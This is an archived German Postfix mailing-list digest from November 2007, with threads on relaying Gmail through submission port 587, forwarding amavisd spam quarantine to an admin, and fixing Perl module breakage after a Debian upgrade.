ich habe Postfix mit sender_dependent_relayhost_maps und smtp_sender_dependent_authentication so konfiguriert, dass er für meie Mail-Accounts an die entsprechenden Server mit den korrekten Zugangsdaten relayed. Alles funktioniert Prima, nur google kocht wohl mal wieder ein eigenes Süppchen. So will Google wohl Submission mit TLS. Kann mir einer auf die Sprünge helfen? Was muss ich in sender_dependent_relayhost_maps eintragen, damit Postfix nicht via SMTP sondern über Submission relayed? -- Greetings Chris From mhaegele at linuxrocks.dyndns.org Wed Nov 7 11:12:50 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Wed, 07 Nov 2007 11:12:50 +0100 Subject: [Postfixbuch-users] spam an eine Mailadresse weiterleiten In-Reply-To: <47318D3E.8050805@helmholtz-hzi.de> References: <20071107093229.267620@gmx.net> <47318D3E.8050805@helmholtz-hzi.de> Message-ID: <47318FA2.3060401@linuxrocks.dyndns.org> Oliver Hoffmann schrieb: > Christian Grau schrieb: >> hallo liste, >> >> ich benutze postfix + amavisd + clamav + spamassasin. >> wie kann ich die erkannten spam - mail, welche als *.gz in >> /var/virusmails >> abgelegt werden an eine zentrale mailadresse senden. dieser empfaenger >> soll so noch einmal alle mails pruefen koennen ob es wirklich spam >> mails sind. >> > $spam_quarantine_to = 'your-email at address.com'; Sehe ich das richtig dass diese Option dann aber die Quarantäne (Ablage im Verzeichnis als File) abschaltet und dann "nur" die Mails an den Empfänger weiterleitet, aber *beides* (Quarantäne und Mailweiterleitung) nicht möglich ist?. > /usr/share/doc/amavisd-new/examples/amavisd.conf-sample.gz > Grüße, > Oliver -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From mail at marcel-hartmann.com Wed Nov 7 11:36:12 2007 From: mail at marcel-hartmann.com (Marcel Hartmann) Date: Wed, 7 Nov 2007 11:36:12 +0100 Subject: [Postfixbuch-users] spam an eine Mailadresse weiterleiten In-Reply-To: <47318FA2.3060401@linuxrocks.dyndns.org> References: <20071107093229.267620@gmx.net> <47318D3E.8050805@helmholtz-hzi.de> <47318FA2.3060401@linuxrocks.dyndns.org> Message-ID: <002a01c8212a$05df4340$119dc9c0$@com> Hallo, > -----Original Message----- > From: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users- > bounces at listi.jpberlin.de] On Behalf Of Matthias Haegele > Sent: Wednesday, November 07, 2007 11:13 AM > To: Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein. > Subject: Re: [Postfixbuch-users] spam an eine Mailadresse weiterleiten > > Oliver Hoffmann schrieb: > > Christian Grau schrieb: > >> hallo liste, > >> > >> ich benutze postfix + amavisd + clamav + spamassasin. > >> wie kann ich die erkannten spam - mail, welche als *.gz in > >> /var/virusmails > >> abgelegt werden an eine zentrale mailadresse senden. dieser empfaenger > >> soll so noch einmal alle mails pruefen koennen ob es wirklich spam > >> mails sind. > >> > > $spam_quarantine_to = 'your-email at address.com'; > > Sehe ich das richtig dass diese Option dann aber die Quarantäne (Ablage > im Verzeichnis als File) abschaltet und dann "nur" die Mails an den > Empfänger weiterleitet, aber *beides* (Quarantäne und Mailweiterleitung) > nicht möglich ist?. > > > /usr/share/doc/amavisd-new/examples/amavisd.conf-sample.gz Da gehe ich mal von aus, aber ich würde es in ein Dir legen lassen und dann per Cronjob über ein Skript alles täglich oder wöchentlich an eine Mailaddy senden lassen. Ich habe auch Interesse an so einer Funktion, jedoch wären dann Informationen wie der ursprüngliche Empfänger und Absender und der Zeitpunkt des Versandes wichtig, damit man wenn doch ein false-positive dabei sein sollte diese noch zustellen kann. Sind die Daten sicherlich noch im Mailheader zu finden denke ich, oder? LG Marcel _____________________________________________ Marcel Hartmann Bokeler Landstraße 24a 26215 Wiefelstede - Bokel Tel. 044 02 - 69 50 62 Fax 044 02 - 69 55 801 e-Mail: mail at marcel-hartmann.com /listinfo/postfixbuch-users From postfixbuch-users at japantest.homelinux.com Wed Nov 7 12:11:48 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Wed, 07 Nov 2007 12:11:48 +0100 Subject: [Postfixbuch-users] smtp_sender_dependent_* + gmail In-Reply-To: <200711071104.37894.kildau-ml@gmx.de> References: <200711071104.37894.kildau-ml@gmx.de> Message-ID: <47319D74.5090004@japantest.homelinux.com> Chris Cohen wrote: > Hi, > > ich habe Postfix mit sender_dependent_relayhost_maps und > smtp_sender_dependent_authentication so konfiguriert, dass er für meie > Mail-Accounts an die entsprechenden Server mit den korrekten Zugangsdaten > relayed. Alles funktioniert Prima, nur google kocht wohl mal wieder ein > eigenes Süppchen. So will Google wohl Submission mit TLS. > Kann mir einer auf die Sprünge helfen? Was muss ich in > sender_dependent_relayhost_maps eintragen, damit Postfix nicht via SMTP > sondern über Submission relayed? /etc/postfix/transport: example.com smtp:[mail.example.com]:587 Genauso auch für den Eintrag in sasl_passwd. Beide müssen übereinstimmen. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From jk at jkart.de Wed Nov 7 12:21:26 2007 From: jk at jkart.de (Jim Knuth) Date: Wed, 07 Nov 2007 12:21:26 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <20071107073136.GC8168@state-of-mind.de> References: <4731220D.30806@jkart.de> <20071107073136.GC8168@state-of-mind.de> Message-ID: <47319FB6.2050308@jkart.de> Patrick Ben Koetter schrieb: > * Jim Knuth : >> Hallo, >> >> ich hab heute ein Upgrade bei Debian gemacht, unter anderem Perl. >> Seitdem startet Amavis nicht mehr und auch CPAN macht auch >> Zicken. Es werden fehlende Module in Zeile 171 "angemeckert". >> >> --snip >> BEGIN { >> fetch_modules('REQUIRED BASIC MODULES', 1, qw( >> Exporter POSIX Fcntl Socket Errno Carp Time::HiRes >> IO::Handle IO::File IO::Socket IO::Socket::UNIX IO::Socket::INET >> IO::Wrap IO::Stringy Digest::MD5 Unix::Syslog File::Basename >> Compress::Zlib MIME::Base64 MIME::QuotedPrint MIME::Words >> MIME::Head MIME::Body MIME::Entity MIME::Parser MIME::Decoder >> MIME::Decoder::Base64 MIME::Decoder::Binary >> MIME::Decoder::QuotedPrint >> MIME::Decoder::NBit MIME::Decoder::UU MIME::Decoder::Gzip64 >> Net::Server Net::Server::PreFork >> --snap > > Findest Du die Module denn, wenn Du mit folgendem Kommando eine Liste der > Module erstellen läßt? > > $ perldoc perllocal > > p at rick > > nee, kommt: --snip server2:~# perldoc perllocal Errno architecture (i486-linux-gnu-thread-multi-2.6.18.3) does not match executable architecture (i486-linux-gnu-thread-multi-2.6.22-3-amd64) at /usr/local/share/perl/5.8.8/Errno.pm line 11. Compilation failed in require at /usr/local/share/perl/5.8.8/File/Temp.pm line 144. BEGIN failed--compilation aborted at /usr/local/share/perl/5.8.8/File/Temp.pm line 144. Compilation failed in require at /usr/share/perl/5.8/Pod/Perldoc.pm line 1482. -- mit freundlichen Gruessen - with kind regard Jim Knuth #ICQ 277289867 From c.wally at cwrm.at Wed Nov 7 12:29:20 2007 From: c.wally at cwrm.at (Christian Wally) Date: Wed, 07 Nov 2007 11:29:20 +0000 Subject: [Postfixbuch-users] spam an eine Mailadresse weiterleiten In-Reply-To: <47318FA2.3060401@linuxrocks.dyndns.org> References: <20071107093229.267620@gmx.net> <47318D3E.8050805@helmholtz-hzi.de> <47318FA2.3060401@linuxrocks.dyndns.org> Message-ID: <1194434960.6736.7.camel@knecht-ruprecht> On Wed, 2007-11-07 at 11:12 +0100, Matthias Haegele wrote: > Oliver Hoffmann schrieb: > > Christian Grau schrieb: > >> hallo liste, > >> > >> ich benutze postfix + amavisd + clamav + spamassasin. > >> wie kann ich die erkannten spam - mail, welche als *.gz in > >> /var/virusmails > >> abgelegt werden an eine zentrale mailadresse senden. dieser empfaenger > >> soll so noch einmal alle mails pruefen koennen ob es wirklich spam > >> mails sind. > >> > > $spam_quarantine_to = 'your-email at address.com'; > > Sehe ich das richtig dass diese Option dann aber die Quarantäne (Ablage > im Verzeichnis als File) abschaltet und dann "nur" die Mails an den > Empfänger weiterleitet, aber *beides* (Quarantäne und Mailweiterleitung) > nicht möglich ist?. > Evtl. hilft $spam_admin = "your-email at address.com"; Dann wird dem "Spam-Admin" eine Benachrichtigung inkl. preview geschickt und die original Mail bleibt in Quarantäne. Ich mache es übrigens so, dass täglich ein Shell Script das Maillog vom Vortag nach Quarantäne Einträgen durchsucht und die ursprünglichen Empfänger in einer Sammel-Mail darüber informiert von welchen Absendern sie Mails bekommen hätten. Über einen Link zu jeder Mail können die User dann die Mails über eine Weboberfläche ansehen und ggf. zustellen lassen. Ich stelle die Scripte gerne zur Verfügung. ciao chris -- Christian Wally Risk Management Jagdbergstrasse 278 6721 Thueringerberg T: +43-720-737014 M: +43-699-19439834 W: http://www.cwrm.at From mail at marcel-hartmann.com Wed Nov 7 12:55:37 2007 From: mail at marcel-hartmann.com (Marcel Hartmann) Date: Wed, 7 Nov 2007 12:55:37 +0100 Subject: [Postfixbuch-users] spam an eine Mailadresse weiterleiten In-Reply-To: <1194434960.6736.7.camel@knecht-ruprecht> References: <20071107093229.267620@gmx.net> <47318D3E.8050805@helmholtz-hzi.de> <47318FA2.3060401@linuxrocks.dyndns.org> <1194434960.6736.7.camel@knecht-ruprecht> Message-ID: <003a01c82135$1dd4d590$597e80b0$@com> > On Wed, 2007-11-07 at 11:12 +0100, Matthias Haegele wrote: > > Oliver Hoffmann schrieb: > > > Christian Grau schrieb: > > >> hallo liste, > > >> > > >> ich benutze postfix + amavisd + clamav + spamassasin. > > >> wie kann ich die erkannten spam - mail, welche als *.gz in > > >> /var/virusmails > > >> abgelegt werden an eine zentrale mailadresse senden. dieser empfaenger > > >> soll so noch einmal alle mails pruefen koennen ob es wirklich spam > > >> mails sind. > > >> > > > $spam_quarantine_to = 'your-email at address.com'; > > > > Sehe ich das richtig dass diese Option dann aber die Quarantäne (Ablage > > im Verzeichnis als File) abschaltet und dann "nur" die Mails an den > > Empfänger weiterleitet, aber *beides* (Quarantäne und Mailweiterleitung) > > nicht möglich ist?. > > > Evtl. hilft > $spam_admin = "your-email at address.com"; > > Dann wird dem "Spam-Admin" eine Benachrichtigung inkl. preview geschickt > und die original Mail bleibt in Quarantäne. > > Ich mache es übrigens so, dass täglich ein Shell Script das Maillog vom > Vortag nach Quarantäne Einträgen durchsucht und die ursprünglichen > Empfänger in einer Sammel-Mail darüber informiert von welchen Absendern > sie Mails bekommen hätten. Über einen Link zu jeder Mail können die User > dann die Mails über eine Weboberfläche ansehen und ggf. zustellen > lassen. > > Ich stelle die Scripte gerne zur Verfügung. > Hört sich gut an, ich bin interessier! :-) LG Marcel From p at state-of-mind.de Wed Nov 7 12:57:42 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Wed, 7 Nov 2007 12:57:42 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <47319FB6.2050308@jkart.de> References: <4731220D.30806@jkart.de> <20071107073136.GC8168@state-of-mind.de> <47319FB6.2050308@jkart.de> Message-ID: <20071107115742.GA12976@state-of-mind.de> * Jim Knuth : > > Findest Du die Module denn, wenn Du mit folgendem Kommando eine Liste der > > Module erstellen läßt? > > > > $ perldoc perllocal > > > > p at rick > > > > > > > nee, kommt: > > --snip > server2:~# perldoc perllocal > Errno architecture (i486-linux-gnu-thread-multi-2.6.18.3) does > not match executable architecture > (i486-linux-gnu-thread-multi-2.6.22-3-amd64) at > /usr/local/share/perl/5.8.8/Errno.pm line 11. > Compilation failed in require at > /usr/local/share/perl/5.8.8/File/Temp.pm line 144. > BEGIN failed--compilation aborted at > /usr/local/share/perl/5.8.8/File/Temp.pm line 144. > Compilation failed in require at > /usr/share/perl/5.8/Pod/Perldoc.pm line 1482. Du brauchst einen PERL-Kenner und nicht mich. ;) p at rick -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From ch.grau at gmx.de Wed Nov 7 13:01:13 2007 From: ch.grau at gmx.de (Christian Grau) Date: Wed, 07 Nov 2007 13:01:13 +0100 Subject: [Postfixbuch-users] spam an eine Mailadresse weiterleiten In-Reply-To: <1194434960.6736.7.camel@knecht-ruprecht> References: <20071107093229.267620@gmx.net> <47318D3E.8050805@helmholtz-hzi.de> <47318FA2.3060401@linuxrocks.dyndns.org> <1194434960.6736.7.camel@knecht-ruprecht> Message-ID: <20071107120113.164010@gmx.net> hallo chris, das script wuerde ich gern testen :-) gruss christian grau -------- Original-Nachricht -------- > Datum: Wed, 07 Nov 2007 11:29:20 +0000 > Von: Christian Wally > An: "Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein." > Betreff: Re: [Postfixbuch-users] spam an eine Mailadresse weiterleiten > > On Wed, 2007-11-07 at 11:12 +0100, Matthias Haegele wrote: > > Oliver Hoffmann schrieb: > > > Christian Grau schrieb: > > >> hallo liste, > > >> > > >> ich benutze postfix + amavisd + clamav + spamassasin. > > >> wie kann ich die erkannten spam - mail, welche als *.gz in > > >> /var/virusmails > > >> abgelegt werden an eine zentrale mailadresse senden. dieser > empfaenger > > >> soll so noch einmal alle mails pruefen koennen ob es wirklich spam > > >> mails sind. > > >> > > > $spam_quarantine_to = 'your-email at address.com'; > > > > Sehe ich das richtig dass diese Option dann aber die Quarantäne (Ablage > > im Verzeichnis als File) abschaltet und dann "nur" die Mails an den > > Empfänger weiterleitet, aber *beides* (Quarantäne und > Mailweiterleitung) > > nicht möglich ist?. > > > Evtl. hilft > $spam_admin = "your-email at address.com"; > > Dann wird dem "Spam-Admin" eine Benachrichtigung inkl. preview geschickt > und die original Mail bleibt in Quarantäne. > > Ich mache es übrigens so, dass täglich ein Shell Script das Maillog vom > Vortag nach Quarantäne Einträgen durchsucht und die ursprünglichen > Empfänger in einer Sammel-Mail darüber informiert von welchen Absendern > sie Mails bekommen hätten. Über einen Link zu jeder Mail können die > User > dann die Mails über eine Weboberfläche ansehen und ggf. zustellen > lassen. > > Ich stelle die Scripte gerne zur Verfügung. > > ciao > chris > > -- > Christian Wally > Risk Management > Jagdbergstrasse 278 > 6721 Thueringerberg > T: +43-720-737014 > M: +43-699-19439834 > W: http://www.cwrm.at > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Psssst! Schon vom neuen GMX MultiMessenger gehört? Der kann`s mit allen: http://www.gmx.net/de/go/multimessenger From jk at jkart.de Wed Nov 7 13:01:45 2007 From: jk at jkart.de (Jim Knuth) Date: Wed, 07 Nov 2007 13:01:45 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <20071107115742.GA12976@state-of-mind.de> References: <4731220D.30806@jkart.de> <20071107073136.GC8168@state-of-mind.de> <47319FB6.2050308@jkart.de> <20071107115742.GA12976@state-of-mind.de> Message-ID: <4731A929.3010107@jkart.de> Patrick Ben Koetter schrieb: > * Jim Knuth : >>> Findest Du die Module denn, wenn Du mit folgendem Kommando eine Liste der >>> Module erstellen läßt? >>> >>> $ perldoc perllocal >>> >>> p at rick >>> >> >> nee, kommt: >> >> --snip >> server2:~# perldoc perllocal >> Errno architecture (i486-linux-gnu-thread-multi-2.6.18.3) does >> not match executable architecture >> (i486-linux-gnu-thread-multi-2.6.22-3-amd64) at >> /usr/local/share/perl/5.8.8/Errno.pm line 11. >> Compilation failed in require at >> /usr/local/share/perl/5.8.8/File/Temp.pm line 144. >> BEGIN failed--compilation aborted at >> /usr/local/share/perl/5.8.8/File/Temp.pm line 144. >> Compilation failed in require at >> /usr/share/perl/5.8/Pod/Perldoc.pm line 1482. > > Du brauchst einen PERL-Kenner und nicht mich. ;) > > p at rick > ja, danke. Wo sind die? -- mit freundlichen Gruessen - with kind regard Jim Knuth #ICQ 277289867 From mhaegele at linuxrocks.dyndns.org Wed Nov 7 13:08:25 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Wed, 07 Nov 2007 13:08:25 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <20071107115742.GA12976@state-of-mind.de> References: <4731220D.30806@jkart.de> <20071107073136.GC8168@state-of-mind.de> <47319FB6.2050308@jkart.de> <20071107115742.GA12976@state-of-mind.de> Message-ID: <4731AAB9.90908@linuxrocks.dyndns.org> Patrick Ben Koetter schrieb: > * Jim Knuth : >>> Findest Du die Module denn, wenn Du mit folgendem Kommando eine Liste der >>> Module erstellen läßt? >>> >>> $ perldoc perllocal >>> >>> p at rick >>> >> >> nee, kommt: >> >> --snip >> server2:~# perldoc perllocal >> Errno architecture (i486-linux-gnu-thread-multi-2.6.18.3) does >> not match executable architecture >> (i486-linux-gnu-thread-multi-2.6.22-3-amd64) at >> /usr/local/share/perl/5.8.8/Errno.pm line 11. >> Compilation failed in require at >> /usr/local/share/perl/5.8.8/File/Temp.pm line 144. >> BEGIN failed--compilation aborted at >> /usr/local/share/perl/5.8.8/File/Temp.pm line 144. >> Compilation failed in require at >> /usr/share/perl/5.8/Pod/Perldoc.pm line 1482. > > Du brauchst einen PERL-Kenner und nicht mich. ;) Nein. Perlkenner bin ich auch nicht ;-). btw: @Jim verwendest du Perl aus Etch oder Testing/unstable? > apt-cache policy perl > perl: > Installiert:5.8.8-7etch1 > Mögliche Pakete:5.8.8-7etch1 > Versions-Tabelle: > 5.8.8-11.1 0 > 400 ftp://ftp.debian.de testing/main Packages > 300 ftp://ftp.debian.de unstable/main Packages > *** 5.8.8-7etch1 0 > 900 http://security.debian.org etch/updates/main Packages > 100 /var/lib/dpkg/status > 5.8.8-7 0 > 900 ftp://ftp.debian.de etch/main Packages > p at rick -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From r.felber at ek-muc.de Wed Nov 7 13:08:41 2007 From: r.felber at ek-muc.de (Robert Felber) Date: Wed, 7 Nov 2007 13:08:41 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <4731A929.3010107@jkart.de> References: <4731220D.30806@jkart.de> <20071107073136.GC8168@state-of-mind.de> <47319FB6.2050308@jkart.de> <20071107115742.GA12976@state-of-mind.de> <4731A929.3010107@jkart.de> Message-ID: <20071107120841.GA53100@robtone.ek-muc.de> On Wed, Nov 07, 2007 at 01:01:22PM +0100, Jim Knuth wrote: > Patrick Ben Koetter schrieb: > > * Jim Knuth : > >>> Findest Du die Module denn, wenn Du mit folgendem Kommando eine Liste der > >>> Module erstellen läßt? > >>> > >>> $ perldoc perllocal > >>> > >>> p at rick > >>> > >> > >> nee, kommt: > >> > >> --snip > >> server2:~# perldoc perllocal > >> Errno architecture (i486-linux-gnu-thread-multi-2.6.18.3) does > >> not match executable architecture > >> (i486-linux-gnu-thread-multi-2.6.22-3-amd64) at > >> /usr/local/share/perl/5.8.8/Errno.pm line 11. > >> Compilation failed in require at > >> /usr/local/share/perl/5.8.8/File/Temp.pm line 144. > >> BEGIN failed--compilation aborted at > >> /usr/local/share/perl/5.8.8/File/Temp.pm line 144. > >> Compilation failed in require at > >> /usr/share/perl/5.8/Pod/Perldoc.pm line 1482. > > > > Du brauchst einen PERL-Kenner und nicht mich. ;) > > > > p at rick > > > > ja, danke. Wo sind die? Ich glaube, das waere eher eine Frage fuer eine debian Liste. Sieht irgendwie nach einem inkompleten upgrade aus. Leider weiss ich nicht, wie man perl "korrekt" auf einem Debian System aktualisiert. -- Robert Felber (PGP: 896CF30B) Munich, Germany From christian at bricart.de Wed Nov 7 13:13:37 2007 From: christian at bricart.de (Christian Bricart) Date: Wed, 7 Nov 2007 13:13:37 +0100 (CET) Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <4731A929.3010107@jkart.de> References: <4731220D.30806@jkart.de> <20071107073136.GC8168@state-of-mind.de> <47319FB6.2050308@jkart.de> <20071107115742.GA12976@state-of-mind.de> <4731A929.3010107@jkart.de> Message-ID: <42151.80.87.162.117.1194437617.squirrel@aachalon.de> Jim Knuth wrote: > [..] >>> server2:~# perldoc perllocal >>> Errno architecture (i486-linux-gnu-thread-multi-2.6.18.3) does >>> not match executable architecture >>> (i486-linux-gnu-thread-multi-2.6.22-3-amd64) at >>> /usr/local/share/perl/5.8.8/Errno.pm line 11. >>> Compilation failed in require at >>> /usr/local/share/perl/5.8.8/File/Temp.pm line 144. >>> BEGIN failed--compilation aborted at >>> /usr/local/share/perl/5.8.8/File/Temp.pm line 144. >>> Compilation failed in require at >>> /usr/share/perl/5.8/Pod/Perldoc.pm line 1482. >> >> Du brauchst einen PERL-Kenner und nicht mich. ;) >> >> p at rick >> > > ja, danke. Wo sind die? Bei Debian?: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=443262 Christian From m.muenz at spam-fetish.org Wed Nov 7 14:27:57 2007 From: m.muenz at spam-fetish.org (Muenz, Michael) Date: Wed, 07 Nov 2007 14:27:57 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <42151.80.87.162.117.1194437617.squirrel@aachalon.de> References: <4731220D.30806@jkart.de> <20071107073136.GC8168@state-of-mind.de> <47319FB6.2050308@jkart.de> <20071107115742.GA12976@state-of-mind.de> <4731A929.3010107@jkart.de> <42151.80.87.162.117.1194437617.squirrel@aachalon.de> Message-ID: <4731BD5D.5040500@spam-fetish.org> >> ja, danke. Wo sind die? > > Bei Debian?: > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=443262 Hab jetzt auch das Problem. Hab auch ziemlich viele Module ueber CPAN installiert und die nicht von Debian genommen. Allerdings: Auf einem System hab ich "cpan" und dann ein "upgrade" ausgefuehrt, alle Module aktualisiert, und erst anschliessend die anstehenden Debianpakete aktualisiert. Fazit: Alles startet ganz normale. Beim anderen System hab ichs nicht gemacht und Schwupps, selbe Meldung wie im Bugreport. Gibts schon nen einfachen Workaround? Merci Michael From c.wally at cwrm.at Wed Nov 7 14:29:37 2007 From: c.wally at cwrm.at (Christian Wally) Date: Wed, 07 Nov 2007 13:29:37 +0000 Subject: [Postfixbuch-users] spam an eine Mailadresse weiterleiten In-Reply-To: <003a01c82135$1dd4d590$597e80b0$@com> References: <20071107093229.267620@gmx.net> <47318D3E.8050805@helmholtz-hzi.de> <47318FA2.3060401@linuxrocks.dyndns.org> <1194434960.6736.7.camel@knecht-ruprecht> <003a01c82135$1dd4d590$597e80b0$@com> Message-ID: <1194442177.6736.11.camel@knecht-ruprecht> On Wed, 2007-11-07 at 12:55 +0100, Marcel Hartmann wrote: > > Ich stelle die Scripte gerne zur Verfügung. > > > > Hört sich gut an, ich bin interessier! :-) > > LG > Marcel > Ok, ich habe noch ein README dazu geschrieben und hoffe dass alles soweit verständlich ist. Bei Rückfragen einfach PM an mich. Hier gehts zum Download: http://www.cwrm.at/index.php?id=83 ciao chris -- Christian Wally Risk Management Jagdbergstrasse 278 6721 Thueringerberg T: +43-720-737014 M: +43-699-19439834 W: http://www.cwrm.at From driessen at fblan.de Wed Nov 7 14:47:44 2007 From: driessen at fblan.de (Uwe Driessen) Date: Wed, 7 Nov 2007 14:47:44 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <20071107120841.GA53100@robtone.ek-muc.de> References: <4731220D.30806@jkart.de> <20071107073136.GC8168@state-of-mind.de><47319FB6.2050308@jkart.de><20071107115742.GA12976@state-of-mind.de><4731A929.3010107@jkart.de> <20071107120841.GA53100@robtone.ek-muc.de> Message-ID: <000001c82144$c61a1530$0565a8c0@uwe> Robert Felber schrieb: > Ich glaube, das waere eher eine Frage fuer eine debian Liste. > Sieht irgendwie nach einem inkompleten upgrade aus. > > Leider weiss ich nicht, wie man perl "korrekt" auf einem Debian > System aktualisiert. apt-get update && apt-get upgrade reicht in der Regel für ein Standard Update apt-get install perl(oder was auch immer) --reinstall apt-get -f install kann man auch mal Probieren wenn Updates nicht sauber durchgeführt wurden. aptitude geht natürlich auch Debian hat da z.T. eigene Anpassungen drin. Ich nutze in der Regel wenn es das Modul von Debian gibt auch die Debian Module um das BS konsistent zu halten. z.T. werden andere Pfade benutzt was dann wenn über 2 verschiedene Wege aktualisiert wird zu Probs führen kann Die angesprochenen Updates sind auch in den originalen Debian-Modulen schon enthalten wenn ich das richtig gelesen habe. > > > -- > Robert Felber (PGP: 896CF30B) > Munich, Germany Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From mhaegele at linuxrocks.dyndns.org Wed Nov 7 15:08:49 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Wed, 07 Nov 2007 15:08:49 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <000001c82144$c61a1530$0565a8c0@uwe> References: <4731220D.30806@jkart.de> <20071107073136.GC8168@state-of-mind.de><47319FB6.2050308@jkart.de><20071107115742.GA12976@state-of-mind.de><4731A929.3010107@jkart.de> <20071107120841.GA53100@robtone.ek-muc.de> <000001c82144$c61a1530$0565a8c0@uwe> Message-ID: <4731C6F1.3000202@linuxrocks.dyndns.org> Uwe Driessen schrieb: > Robert Felber schrieb: >> Ich glaube, das waere eher eine Frage fuer eine debian Liste. >> Sieht irgendwie nach einem inkompleten upgrade aus. >> >> Leider weiss ich nicht, wie man perl "korrekt" auf einem Debian >> System aktualisiert. Eine konsistente Methode sollte man halt wählen. "Mischmasch" führt in der Regel früher oder später zu Problemen. (Dem Paketsystem ist ja schliesslich das an ihm "vorbei installierte" nicht bekannt). > apt-get update && apt-get upgrade reicht in der Regel für ein Standard Update > > apt-get install perl(oder was auch immer) --reinstall > apt-get -f install kann man auch mal Probieren wenn Updates nicht sauber durchgeführt > wurden. > aptitude geht natürlich auch Manchmal muss man Pakete von Hand entfernen (solange man nicht -purge verwendet sollte eine Reinstallation keine Probleme bereiten) wenn sich "unauflösbare Abhängigkeitsprobleme" ergeben, auf die Option -f würde ich nicht blind vertrauen ... Das Paketsystem warnt einen nicht grundlos vor schlecht bewerteten "Lösungsversuchen". > Debian hat da z.T. eigene Anpassungen drin. > Ich nutze in der Regel wenn es das Modul von Debian gibt auch die Debian Module um das BS > konsistent zu halten. > z.T. werden andere Pfade benutzt was dann wenn über 2 verschiedene Wege aktualisiert wird > zu Probs führen kann > > Die angesprochenen Updates sind auch in den originalen Debian-Modulen schon enthalten wenn > ich das richtig gelesen habe. > >> >> -- >> Robert Felber (PGP: 896CF30B) >> Munich, Germany > > > Mit freundlichen Grüßen > > Drießen > -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From m.muenz at spam-fetish.org Wed Nov 7 15:35:38 2007 From: m.muenz at spam-fetish.org (Muenz, Michael) Date: Wed, 07 Nov 2007 15:35:38 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <4731BD5D.5040500@spam-fetish.org> References: <4731220D.30806@jkart.de> <20071107073136.GC8168@state-of-mind.de> <47319FB6.2050308@jkart.de> <20071107115742.GA12976@state-of-mind.de> <4731A929.3010107@jkart.de> <42151.80.87.162.117.1194437617.squirrel@aachalon.de> <4731BD5D.5040500@spam-fetish.org> Message-ID: <4731CD3A.5080407@spam-fetish.org> Muenz, Michael schrieb: >>> ja, danke. Wo sind die? >> Bei Debian?: >> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=443262 > > Hab jetzt auch das Problem. Hab auch ziemlich viele Module > ueber CPAN installiert und die nicht von Debian genommen. > Allerdings: Auf einem System hab ich "cpan" und dann ein > "upgrade" ausgefuehrt, alle Module aktualisiert, und erst > anschliessend die anstehenden Debianpakete aktualisiert. > Fazit: Alles startet ganz normale. Beim anderen System hab > ichs nicht gemacht und Schwupps, selbe Meldung wie im > Bugreport. > > Gibts schon nen einfachen Workaround? Also, bei mir hats so dann funktioniert: cd /usr/local/share/perl/5.8.8/ mv LWP __LWP mv LWP.pm __LWP.pm mv Errno.pm __Errno.pm cpan upgrade Dann sind alle Module wieder aktuell und LWP und Errno neu installiert. Amavis startet auch wieder problemlos ... Michael From kildau-ml at gmx.de Wed Nov 7 16:49:22 2007 From: kildau-ml at gmx.de (Chris Cohen) Date: Wed, 7 Nov 2007 16:49:22 +0100 Subject: [Postfixbuch-users] smtp_sender_dependent_* + gmail In-Reply-To: <47319D74.5090004@japantest.homelinux.com> References: <200711071104.37894.kildau-ml@gmx.de> <47319D74.5090004@japantest.homelinux.com> Message-ID: <200711071649.22915.kildau-ml@gmx.de> On Wednesday 07 November 2007 12:11:48 Sandy Drobic wrote: > Chris Cohen wrote: > > Hi, > > > > ich habe Postfix mit sender_dependent_relayhost_maps und > > smtp_sender_dependent_authentication so konfiguriert, dass er für meie > > Mail-Accounts an die entsprechenden Server mit den korrekten Zugangsdaten > > relayed. Alles funktioniert Prima, nur google kocht wohl mal wieder ein > > eigenes Süppchen. So will Google wohl Submission mit TLS. > > Kann mir einer auf die Sprünge helfen? Was muss ich in > > sender_dependent_relayhost_maps eintragen, damit Postfix nicht via SMTP > > sondern über Submission relayed? > > /etc/postfix/transport: > example.com smtp:[mail.example.com]:587 > > Genauso auch für den Eintrag in sasl_passwd. Beide müssen übereinstimmen. Hmmm.... so richtig blicke ich noch nicht durch. Ich hab jetzt in transport: example at gmail.com [smtp.gmail.com]:587 (hab' 2 gmail adressen, deswegen) und ich sasl_passwd: example at gmail.com example:secret Ich vermute mal das meintest du mit beide müssen übereinstimmen? In meinen logs finde ich immernoch: Nov 7 16:42:53 daisy postfix/smtp[14315]: 0E8D5637BF: to=, relay=smtp.gmail.com[209.85.135.109]:587, 